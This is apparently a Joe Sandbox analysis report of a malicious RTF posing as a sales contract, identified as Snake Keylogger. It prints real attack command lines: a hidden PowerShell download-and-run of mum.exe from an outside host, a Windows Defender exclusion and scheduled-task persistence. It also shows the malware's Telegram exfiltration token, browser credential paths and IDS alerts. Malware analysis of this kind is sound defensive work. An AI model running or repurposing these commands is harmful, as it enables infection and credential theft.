Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Revised sales contract for Crosswear.rtf

Overview

General Information

Sample Name:Revised sales contract for Crosswear.rtf
Analysis ID:688701
MD5:74ab9855f26b0cc2fca1fefd566f5642
SHA1:09ebb7681f9989b7e98a17cbbff3cd7783712874
SHA256:cda65753e2459754b1afd749ac2ce1c65415de966179e9bb53e822321c02c7ff
Tags:rtf
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Microsoft Office creates scripting files
Tries to steal Mail credentials (via file / registry access)
Office process drops PE file
Injects files into Windows application
Document contains OLE streams with names of living off the land binaries
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Suspicious powershell command line found
Document contains a stream with embedded javascript code
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
Yara detected Generic Downloader
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Found suspicious RTF objects
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2728 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 2016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2348 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mum.exe (PID: 1724 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)
        • powershell.exe (PID: 1808 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 1916 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpEFF.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • mum.exe (PID: 2588 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)
    • powershell.exe (PID: 2572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1672 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mum.exe (PID: 2520 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)
        • powershell.exe (PID: 2864 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 2940 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmp430A.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • mum.exe (PID: 2024 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)
        • mum.exe (PID: 1484 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)
        • svchost.exe (PID: 2024 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
    • powershell.exe (PID: 684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 1732 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mum.exe (PID: 2708 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)
        • powershell.exe (PID: 1920 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 544 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpA5B2.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • mum.exe (PID: 828 cmdline: C:\Users\user\AppData\Roaming\mum.exe MD5: 06C16E9A1807F8754D73C6B77E978D02)
    • verclsid.exe (PID: 772 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2940 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup
{"Exfil Mode": "Telegram", "Telegram Token": "5653882710:AAFqiub7KKNl9WuwdcBa3Hc2Wwy7UHDnsWc", "Telegram ID": "1120598411"}
SourceRuleDescriptionAuthorStrings
Revised sales contract for Crosswear.rtfINDICATOR_RTF_Exploit_Scriptingdetects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.ditekSHen
  • 0xb5da:$clsid2: 0003000000000000C000000000000046
  • 0xad38:$ole6: D0Cf11E
  • 0x955:$obj2: \objdata
  • 0xaced:$obj2: \objdata
  • 0xacd9:$obj3: \objupdate
  • 0xac54:$obj4: \objemb
  • 0xc258:$obj4: \objemb
  • 0xac43:$obj6: \objlink
  • 0xa68:$sct1: 33 43 37 33 36 33 37 32 36 39 37 30 37 34 36 43 36 35 35 34
  • 0x8426:$sct2: 35 37 35 33 36 33 37 32 36 39 37 30 37 34 32 45 35 33 36 38 36 35 36 43 36 43
Revised sales contract for Crosswear.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x955:$obj2: \objdata
  • 0xaced:$obj2: \objdata
  • 0xacd9:$obj3: \objupdate
  • 0xac54:$obj4: \objemb
  • 0xc258:$obj4: \objemb
  • 0xac43:$obj6: \objlink
SourceRuleDescriptionAuthorStrings
00000009.00000002.937156653.0000000000240000.00000004.00000020.00020000.00000000.sdmpSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth
  • 0x324c:$s3: System.Net.WebClient).DownloadFile('httP
00000009.00000002.937156653.0000000000240000.00000004.00000020.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x279a:$sb1: -W Hidden
  • 0x320b:$sb1: -W Hidden
  • 0x277a:$sc1: -NoP
  • 0x31fb:$sc1: -NoP
  • 0x278e:$sd1: -NonI
  • 0x3205:$sd1: -NonI
  • 0x27ae:$se3: -ExecutionPolicy bypass
  • 0x3215:$se3: -ExecutionPolicy bypass
  • 0x2784:$sf1: -sta
  • 0x3200:$sf1: -sta
00000004.00000002.914867466.00000000001FF000.00000004.00000020.00020000.00000000.sdmpSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth
  • 0xe869:$s3: System.Net.WebClient).DownloadFile('httP
00000004.00000002.915030344.0000000001B26000.00000004.00000020.00020000.00000000.sdmpSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth
  • 0x949:$s3: System.Net.WebClient).DownloadFile('httP
00000004.00000002.914809669.0000000000150000.00000004.00000020.00020000.00000000.sdmpSuspicious_PowerShell_WebDownload_1Detects suspicious PowerShell code that downloads from web sitesFlorian Roth
  • 0x324c:$s3: System.Net.WebClient).DownloadFile('httP
Click to see the 35 entries
SourceRuleDescriptionAuthorStrings
15.0.mum.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
  • 0x1b136:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x1a31f:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x1a766:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1b8e7:$a5: \Kometa\User Data\Default\Login Data
15.0.mum.exe.400000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    15.0.mum.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      15.0.mum.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        15.0.mum.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 44 entries
          No Sigma rule has matched
          Timestamp:192.168.2.22132.226.8.16949173802842536 08/23/22-13:43:14.345361
          SID:2842536
          Source Port:49173
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22193.122.130.049175802842536 08/23/22-13:43:56.802113
          SID:2842536
          Source Port:49175
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.22193.122.130.049174802842536 08/23/22-13:43:29.255487
          SID:2842536
          Source Port:49174
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Revised sales contract for Crosswear.rtfReversingLabs: Detection: 32%
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exeAvira: detection malicious, Label: HEUR/AGEN.1250356
          Source: C:\Users\user\AppData\Roaming\mum.exeAvira: detection malicious, Label: HEUR/AGEN.1250356
          Source: C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exeAvira: detection malicious, Label: HEUR/AGEN.1250356
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exeReversingLabs: Detection: 80%
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\mum.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exeJoe Sandbox ML: detected
          Source: 15.0.mum.exe.400000.0.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 8.2.mum.exe.3859130.8.raw.unpackMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram Token": "5653882710:AAFqiub7KKNl9WuwdcBa3Hc2Wwy7UHDnsWc", "Telegram ID": "1120598411"}
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: :\Windows\mscorlib.pdb3 source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\mscorlib.pdb#\'$ source: powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdb?\'$ source: powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdb/ source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.938797772.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.965391523.0000000002354000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

          Software Vulnerabilities

          barindex
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: mum[1].exe.0.drJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scTJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exeJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scTJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficDNS query: name: f0705964.xsph.ru
          Source: global trafficDNS query: name: f0705964.xsph.ru
          Source: global trafficDNS query: name: checkip.dyndns.org
          Source: global trafficDNS query: name: checkip.dyndns.org
          Source: global trafficDNS query: name: checkip.dyndns.org
          Source: global trafficDNS query: name: checkip.dyndns.org
          Source: global trafficDNS query: name: checkip.dyndns.org
          Source: global trafficDNS query: name: checkip.dyndns.org
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CE6F9h15_2_002CE440
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CEB51h15_2_002CE89C
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CEFA9h15_2_002CECF0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CC439h15_2_002CC17F
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002C3897h15_2_002C3576
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CF401h15_2_002CF148
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CF859h15_2_002CF5A4
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CFCB1h15_2_002CF9FB
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CC891h15_2_002CC5DC
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002C28E1h15_2_002C2620
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002C3CF7h15_2_002C3A38
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CCCE9h15_2_002CCA30
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CD141h15_2_002CCE88
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002C4157h15_2_002C3E98
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002C2EA2h15_2_002C2A90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CD599h15_2_002CD2E0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002C45B7h15_2_002C42F9
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CD9F1h15_2_002CD738
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002C4A17h15_2_002C4758
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CDE49h15_2_002CDB90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002CE2A1h15_2_002CDFE8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_002C217A
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002C2EA2h15_2_002C2DD1
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_002C1B48
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_002C2359
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E6AE1h15_2_003E6838
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E80C1h15_2_003E7E18
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E18A9h15_2_003E1600
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E8519h15_2_003E8270
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E1D01h15_2_003E1A58
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E5501h15_2_003E5258
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E02F1h15_2_003E0048
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E0749h15_2_003E04A0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E6F39h15_2_003E6C90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E0BA1h15_2_003E08F8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E5981h15_2_003E56D8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E8971h15_2_003E86C8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E5DD9h15_2_003E5B30
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E8DC9h15_2_003E8B20
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E73BAh15_2_003E7110
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E9221h15_2_003E8F78
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E7811h15_2_003E7568
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E0FF9h15_2_003E0D50
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E1451h15_2_003E11A8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E6231h15_2_003E5F88
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E6689h15_2_003E63E0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 003E7C69h15_2_003E79C0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_003E3498
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_003E3489
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]15_2_003E37AE
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CE6F9h26_2_001CE440
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CEB51h26_2_001CE89A
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CEFA9h26_2_001CECF0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CF401h26_2_001CF148
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CC439h26_2_001CC17F
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001C3897h26_2_001C3576
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CF859h26_2_001CF5A2
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CFCB1h26_2_001CF9FA
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CC891h26_2_001CC5E2
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001C3CF7h26_2_001C3A38
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CCCE9h26_2_001CCA30
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001C28E1h26_2_001C2620
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001C4157h26_2_001C3E98
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001C2EA2h26_2_001C2A90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CD141h26_2_001CCE88
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001C45B7h26_2_001C42F9
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CD599h26_2_001CD2E0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CD9F1h26_2_001CD738
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001C4A17h26_2_001C4758
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CDE49h26_2_001CDB90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001CE2A1h26_2_001CDFE8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h26_2_001C217A
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 001C2EA2h26_2_001C2DD1
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h26_2_001C2359
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h26_2_001C1B48
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E6AE1h26_2_002E6838
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E18A9h26_2_002E1600
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E80C1h26_2_002E7E18
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E8519h26_2_002E8270
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E02F1h26_2_002E0048
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E1D01h26_2_002E1A58
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E5501h26_2_002E5258
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E0749h26_2_002E04A0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E6F39h26_2_002E6C90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E0BA1h26_2_002E08F8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E8971h26_2_002E86C8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E5981h26_2_002E56D8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E8DC9h26_2_002E8B20
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E5DD9h26_2_002E5B30
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E73BAh26_2_002E7110
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E7811h26_2_002E7568
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E9221h26_2_002E8F78
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E0FF9h26_2_002E0D50
